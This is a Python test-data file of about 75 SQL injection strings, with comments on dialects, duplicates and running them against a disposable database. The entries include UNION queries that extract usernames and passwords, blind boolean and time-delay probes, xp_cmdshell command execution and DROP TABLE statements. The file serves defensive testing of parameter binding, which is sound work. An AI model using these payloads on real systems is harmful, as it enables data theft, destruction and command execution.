SQL 注入测试样本列表
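# Negative-test inputs for checking how an application handles SQL
# metacharacters in user-supplied values. When the code under test binds
# these as parameters, each entry should be stored or compared as a literal
# string and the query shape should not change.
#
# Notes for whoever wires this into a test harness:
# - The entries mix dialects: WAITFOR DELAY, xp_cmdshell, sp_executesql, TOP
#   and CONVERT(int, ...) are SQL Server syntax; @@datadir, database(),
#   GROUP_CONCAT, "LIMIT 0,1" and the "#" comment are MySQL syntax;
#   EXECUTE IMMEDIATE and DUAL are Oracle-style. On any one backend many
#   entries are simply invalid SQL, so a database error alone is not a signal.
# - Entries starting with "';" are stacked statements and some of them drop
#   tables, so the target of the test has to be a disposable database.
# - The WAITFOR entries only show anything if the harness measures response
#   time against a baseline.
# - Several entries appear more than once. They are kept so that the list
#   matches the original order; use list(dict.fromkeys(...)) at the call
#   site if unique values are wanted.
# - Every entry must end with a comma. Python joins adjacent string literals
#   without any warning, which would merge neighbouring entries into one
#   string and quietly shrink the list.
SQL_INJECTION_PAYLOADS = [
    # Bare quote characters: the simplest probe for unescaped input.
    "'",
    '"',
    "' OR '1'='1' --",
    "' OR '1'='1' /*",
    "' OR 1=1 --",
    "' OR 1=1 /*",
    "' UNION SELECT NULL, username, password FROM users --",
    "' UNION SELECT 1, @@version --",
    "' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a' --",
    "' HAVING 1=1 --",
    "'; DROP TABLE users; --",
    "'; EXEC xp_cmdshell('whoami'); --",
    "'; SELECT * FROM information_schema.tables; --",
    "' AND 1=(SELECT COUNT(*) FROM users) --",
    "'; SELECT concat(username, ':', password) FROM users --",
    "'; WAITFOR DELAY '0:0:5'; --",
    "' OR (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1/0) END) --",
    "' UNION SELECT NULL, NULL, NULL, NULL, NULL, NULL --",
    "' AND EXISTS(SELECT * FROM users WHERE username='admin') --",
    "'; SELECT @@datadir; --",
    "' AND ascii(substring((SELECT password FROM users WHERE username='admin'),1,1)) > 100 --",
    # The trailing quote after "--" is part of the source value and is kept.
    "'; WAITFOR DELAY \'0:0:10\' --'",
    "' AND 1=1 /* OR 1=2 */",
    "' UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema = database() --",
    "' AND (SELECT ASCII(SUBSTRING((SELECT column_name FROM table_name LIMIT 0,1), 1, 1)) = 104) --",
    "' UNION SELECT NULL, (SELECT column_name FROM table_name) --",
    "' UNION SELECT NULL, (SELECT column_name FROM table_name) --",
    "' AND (SELECT CAST(1 AS CHAR) FROM DUAL) --",
    "' AND (SELECT 1) AND (SELECT 2) --",
    "' OR '1'='1' --",
    "' OR 1=1 --",
    "' OR 1=1 /*",
    "' OR 1=1 #",
    "' OR 1=1 --",
    "' UNION SELECT NULL, username, password FROM users --",
    "' UNION SELECT NULL, table_name FROM information_schema.tables --",
    "' UNION SELECT username, password FROM users WHERE '1' = '1' --",
    "' UNION SELECT 1, database() --",
    "' UNION SELECT NULL, COUNT(*) FROM users --",
    "' AND 1=(SELECT COUNT(*) FROM users) --",
    "' AND (SELECT SUBSTRING(@@version,1,1)) = '5' --",
    "'; WAITFOR DELAY '0:0:5'; --",
    "'; EXEC xp_cmdshell('whoami'); --",
    "'; EXECUTE IMMEDIATE 'DROP TABLE users'; --",
    "'; SELECT @@datadir; --",
    "'; SELECT GROUP_CONCAT(username) FROM users; --",
    "'; SELECT * FROM information_schema.columns WHERE table_name='users'; --",
    "' AND 1=(SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END FROM users LIMIT 1) --",
    "' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username='admin')='a' --",
    "' AND 1=CONVERT(int, (SELECT @@version)) --",
    "' AND 1=(SELECT TOP 1 NULL FROM users) --",
    "' AND (SELECT username FROM users WHERE username LIKE 'ad%') IS NOT NULL --",
    "' AND NOT EXISTS(SELECT * FROM users WHERE username='admin') --",
    "' AND 1 IN (SELECT COUNT(*) FROM users) --",
    "' UNION SELECT NULL, NULL, NULL --",
    "' UNION SELECT NULL, (SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1) --",
    "' AND (SELECT CAST(1 AS CHAR) FROM dual) --",
    "'; SELECT 1; --",
    "'; IF(1=1) WAITFOR DELAY '0:0:5' --",
    "'; IF NOT EXISTS (SELECT * FROM users) WAITFOR DELAY '0:0:10' --",
    "' AND (SELECT 1) = 1 --",
    "' AND (SELECT CASE WHEN (username='admin') THEN 1 ELSE 0 END) = 1 --",
    "' AND (SELECT LENGTH(password) FROM users WHERE username='admin') > 5 --",
    "'; IF((SELECT username FROM users WHERE username='admin') = 'admin') WAITFOR DELAY '0:0:5' --",
    "'; IF((SELECT COUNT(*) FROM users) > 0) WAITFOR DELAY '0:0:5' --",
    "'; DECLARE @result INT; SET @result = (SELECT COUNT(*) FROM users); IF @result = 1 WAITFOR DELAY '0:0:5' --",
    "' UNION SELECT NULL, table_name FROM information_schema.tables WHERE table_schema=database() --",
    "' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' --",
    "'; DECLARE @sql NVARCHAR(MAX); SET @sql = 'SELECT * FROM users'; EXEC sp_executesql @sql; --",
    "'; SET @sql = 'DROP TABLE users'; EXEC(@sql); --",
    "' AND ASCII(SUBSTRING((SELECT TOP 1 password FROM users WHERE username='admin'), 1, 1)) = 97 --",
    "' AND LENGTH(username) = 5 --",
    "' AND (SELECT CASE WHEN (SELECT password FROM users WHERE username='admin') LIKE 'a%' THEN 1 ELSE 0 END) = 1 --",
]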